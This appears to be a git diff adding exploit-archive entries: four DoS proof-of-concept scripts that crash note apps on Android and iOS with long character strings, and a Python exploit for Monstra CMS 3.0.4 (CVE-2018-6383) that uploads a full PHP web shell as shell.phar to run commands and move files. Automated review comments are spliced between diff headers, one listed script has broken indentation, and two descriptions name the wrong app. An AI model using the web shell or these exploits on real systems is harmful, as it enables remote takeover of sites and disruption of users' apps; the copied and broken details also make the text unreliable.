diff --git a/exploits/android/dos/49946.txt b/exploits/android/dos/49946.txt
new file mode 100644
index 000000000..6434b7f5c
--- /dev/null
+++ b/exploits/android/dos/49946.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Inkpad Notepad & To do list 4.3.61 - Denial of Service (PoC)
+# Date: 2021-06-03
+# Author: Brian RodrÃguez
+# Download Link: https://play.google.com/store/apps/details?id=com.workpail.inkpad.notepad.notes&hl=es_MX
+# Version: 4.3.61
+# Category: DoS (Android)
+
+##### Vulnerability #####
+
+InkPad Bloc de notas - Tareas is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against Android 8.0.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 50000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/49952.py b/exploits/ios/dos/49952.py
new file mode 100755
index 000000000..a131a0ad6
--- /dev/null
+++ b/exploits/ios/dos/49952.py
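Review bot: The author line in the new file's header reads `Brian RodrÃguez`, which looks like UTF-8 text that was re-decoded as Latin-1 (`Ã` followed by an invisible byte where `í` should be); saving the file as UTF-8 would make the name render as written. In the payload.py listing the bare `except:` swallows every exception, including KeyboardInterrupt, and discards the reason the file could not be written; `except OSError as e:` with `print("File cannot be created:", e)` keeps the failure diagnosable. The open/write/close sequence would also be safer as `with open("payload.txt", "w") as f: f.write(buffer)`, which closes the handle even if the write raises. The same bare `except:` and manual close appear in the new 49952.py, 49953.py and 49954.py.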
@@ -0,0 +1,35 @@
+# Exploit Title: Color Notes 1.4 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/gt/app/color-notes/id830515136
+# Version: 1.4
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+f = open("payload.txt","w")
+f.write(buffer)
+f.close()
+print ("File created")
+except:
+print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/49953.py b/exploits/ios/dos/49953.py
new file mode 100755
index 000000000..6f509fc40
--- /dev/null
+++ b/exploits/ios/dos/49953.py
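Review bot: The `try:`/`except:` bodies in this 49952.py are not indented (`+try: +f = open(...)`, `+except: +print (...)`), so the file is not valid Python and raises IndentationError before it writes anything; the sibling files 49953.py and 49954.py in this commit show the intended layout, with the four statements after `try:` and the `print` after `except:` indented one level. Because the whole listing sits under a `#!/usr/bin/env python` shebang and is added as an executable file (mode 100755), the syntax error is hit on every run. The `# Date: 06-04-2021` header is also ambiguous between 4 June and 6 April, while 49946.txt in the same commit uses the unambiguous `2021-06-03` form; using the ISO form here and in 49953.py and 49954.py would remove the doubt.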
@@ -0,0 +1,35 @@
+# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221
+# Version: 5.5
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/ios/dos/49954.py b/exploits/ios/dos/49954.py
new file mode 100755
index 000000000..94d1838eb
--- /dev/null
+++ b/exploits/ios/dos/49954.py
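Review bot: The vulnerability paragraph in this 49953.py still says `Color Notes is vulnerable to a DoS condition ...`, but the header names the product as Macaron Notes great notebook 5.5, so the description looks like copy-paste residue from 49952.py and contradicts the title and download link. It should read `Macaron Notes great notebook is vulnerable to a DoS condition when a long list of characters is being used when creating a note:`. The same stale "Color Notes" sentence appears in 49954.py, whose header names My Notes Safe 5.3.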
@@ -0,0 +1,35 @@
+# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC)
+# Date: 06-04-2021
+# Author: Geovanni Ruiz
+# Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781
+# Version: 5.3
+# Category: DoS (iOS)
+
+##### Vulnerability #####
+
+Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
+
+# STEPS #
+# Open the program.
+# Create a new Note.
+# Run the python exploit script payload.py, it will create a new payload.txt file
+# Copy the content of the file "payload.txt"
+# Paste the content from payload.txt twice in the new Note.
+# Crashed
+
+Successful exploitation will cause the application to stop working.
+
+I have been able to test this exploit against iOS 14.2.
+
+##### PoC #####
+--> payload.py <--
+#!/usr/bin/env python
+buffer = "\x41" * 350000
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print ("File created")
+except:
+ print ("File cannot be created")
\ No newline at end of file
diff --git a/exploits/php/webapps/49949.py b/exploits/php/webapps/49949.py
new file mode 100755
index 000000000..d92fdb924
--- /dev/null
+++ b/exploits/php/webapps/49949.py
@@ -0,0 +1,101 @@ +# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated) +# Date: 03.06.2021 +# Exploit Author: Ron Jost (hacker5preme) +# Vendor Homepage: https://monstra.org/ +# Software Link: https://monstra.org/monstra-3.0.4.zip +# Version: 3.0.4 +# Tested on: Ubuntu 20.04 +# CVE: CVE-2018-6383 +# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-6383-Exploit + +''' +Description: +Monstra CMS through 3.0.4 has an incomplete "forbidden types" list that excludes .php (and similar) file extensions +but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code + by uploading a file, a different vulnerability than CVE-2017-18048. +''' + + +''' +Import required modules: +''' +import argparse +import requests + + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Exploit for CVE-2018-6383') +my_parser.add_argument('-T', type=str, help='Target IP') +my_parser.add_argument('-P', type=str, help='Target Port') +my_parser.add_argument("-U", type=str, help="Monstra CMS Path") +my_parser.add_argument('-u', type=str, help="Username") +my_parser.add_argument('-p', type=str, help='Password') +args = my_parser.parse_args() +target_ip = args.T +target_port = args.P +Monstracms_path = args.U +username = args.u +password = args.p + + +''' +Exploit: +''' +# Cookies: +session = requests.Session() +url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php' +cookies = session.get(url).cookies.get_dict() +value = cookies['PHPSESSID'] +cookies = { + "__atuvc": "9%7C22", + 'PHPSESSID': 'sga7s1jb0o3b7dlueh5soin8a9' +} + +# Construct authentication header: +headers = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + 
"Content-Type": "application/x-www-form-urlencoded", + "Origin": "http://" + target_ip, + "Connection": "close", + "Referer": "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php', + "Upgrade-Insecure-Requests": "1"} + +# Construct authentication body +body = { + "login": username, + "password": password, + "login_submit": "Log In"} +x = requests.post(url, headers=headers, cookies=cookies, data=body) + +# Construct Exploit link: +url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager' + +# Construct Exploit header: +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------27822155982314896762160847658", + "Origin": "http://" + target_ip, + "Connection": "close", + "Referer": "http://" + target_ip + Monstracms_path + 'admin/index.php?id=filesmanager', + "Upgrade-Insecure-Requests": "1" +} + +# Construct Exploit data: +burp0_data = "-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"csrf\"\r\n\r\n1e71963993909d612c40962b401c556b70e9bb3c\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.phar\"\r\nContent-Type: application/octet-stream\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => 
getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n
\n \n\n\n\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n\n